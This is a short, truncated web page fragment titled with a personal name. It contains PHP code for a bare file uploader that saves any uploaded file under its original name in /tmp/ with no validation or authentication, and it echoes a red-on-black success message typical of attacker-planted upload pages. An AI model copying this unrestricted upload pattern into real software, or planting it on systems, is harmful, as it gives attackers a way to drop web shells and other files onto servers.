http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />Avinash Kumar Thapa<title>Avinash Kumar Thapa</title><body bgcolor="white">$uploaddir = '/tmp/'; // Change the directory as per the requirement$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);if(move_uploaded_file($_FILES['userfile']['tmp_name'],$uploadfile)) { print '<body bgcolor=#000><divalign=center><font size=5 color=#ff0000>uploaded successfully</font>